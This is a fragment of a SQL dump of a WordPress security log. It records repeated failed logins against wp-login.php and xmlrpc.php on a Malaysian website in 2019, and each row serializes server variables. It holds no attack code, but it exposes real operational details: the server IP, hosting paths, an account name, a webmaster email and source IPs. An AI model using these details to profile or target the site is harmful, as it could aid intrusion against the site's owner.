empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"211.171.250.169\";s:11:\"REMOTE_PORT\";s:5:\"45382\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWx0v8HMNng1AySUGyay9wAAAMY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567388863.3171\";s:12:\"REQUEST_TIME\";s:10:\"1567388863\";}}','notice','2019-09-02 01:47:44','2019-09-02 01:47:43',17688912,19181184,'https://bintara.com.my/wp-login.php',1,0,'211.171.250.169'),(23519,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.163.230.76\";s:11:\"REMOTE_PORT\";s:5:\"32940\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxqaTU4VuPOeWsfkg0oQwAAARQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567386217.3823\";s:12:\"REQUEST_TIME\";s:10:\"1567386217\";}}','notice','2019-09-02 01:03:38','2019-09-02 01:03:37',17688912,19181496,'https://bintara.com.my/wp-login.php',1,0,'192.163.230.76'),(23520,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.163.230.76\";s:11:\"REMOTE_PORT\";s:5:\"33906\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxqbVvRyrCg9V6axS2zPwAAAVE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567386221.1739\";s:12:\"REQUEST_TIME\";s:10:\"1567386221\";}}','notice','2019-09-02 01:03:42','2019-09-02 01:03:41',18205536,19503040,'https://bintara.com.my/xmlrpc.php',1,0,'192.163.230.76'),(23521,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"211.171.250.169\";s:11:\"REMOTE_PORT\";s:5:\"60042\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxt0DU4VuPOeWsfkg0o4wAAARM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567387088.5083\";s:12:\"REQUEST_TIME\";s:10:\"1567387088\";}}','notice','2019-09-02 01:18:09','2019-09-02 01:18:08',17690392,19181888,'https://bintara.com.my/wp-login.php',1,0,'211.171.250.169'),(23522,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"211.171.250.169\";s:11:\"REMOTE_PORT\";s:5:\"60378\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxt0mje8g9YegPUhtOTzAAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567387091.0817\";s:12:\"REQUEST_TIME\";s:10:\"1567387091\";}}','notice','2019-09-02 01:18:12','2019-09-02 01:18:11',18204880,19500400,'https://bintara.com.my/xmlrpc.php',1,0,'211.171.250.169'),(23523,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.65.137.215\";s:11:\"REMOTE_PORT\";s:5:\"35536\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxxGFvRyrCg9V6axS25LgAAAUY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567387928.1634\";s:12:\"REQUEST_TIME\";s:10:\"1567387928\";}}','notice','2019-09-02 01:32:09','2019-09-02 01:32:08',17688936,19179784,'https://bintara.com.my/wp-login.php',1,0,'185.65.137.215'),(23524,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"185.65.137.215\";s:11:\"REMOTE_PORT\";s:5:\"35729\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxxGzU4VuPOeWsfkg0pqgAAAQo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567387931.1945\";s:12:\"REQUEST_TIME\";s:10:\"1567387931\";}}','notice','2019-09-02 01:32:12','2019-09-02 01:32:11',18204880,19502072,'https://bintara.com.my/xmlrpc.php',1,0,'185.65.137.215'),(23518,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.164.45\";s:11:\"REMOTE_PORT\";s:5:\"50814\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxnFd9YzdT54U4Mrp8nKAAAAZM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567385365.3786\";s:12:\"REQUEST_TIME\";s:10:\"1567385365\";}}','notice','2019-09-02 00:49:26','2019-09-02 00:49:25',18207232,19504976,'https://bintara.com.my/xmlrpc.php',1,0,'144.217.164.45'),(23517,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"144.217.164.45\";s:11:\"REMOTE_PORT\";s:5:\"50204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWxnDFvRyrCg9V6axS2x1QAAAUY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567385356.2787\";s:12:\"REQUEST_TIME\";s:10:\"1567385356\";}}','notice','2019-09-02 00:49:17','2019-09-02 00:49:16',17689832,19180664,'https://bintara.com.my/wp-login.php',1,0,'144.217.164.45'),(23516,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 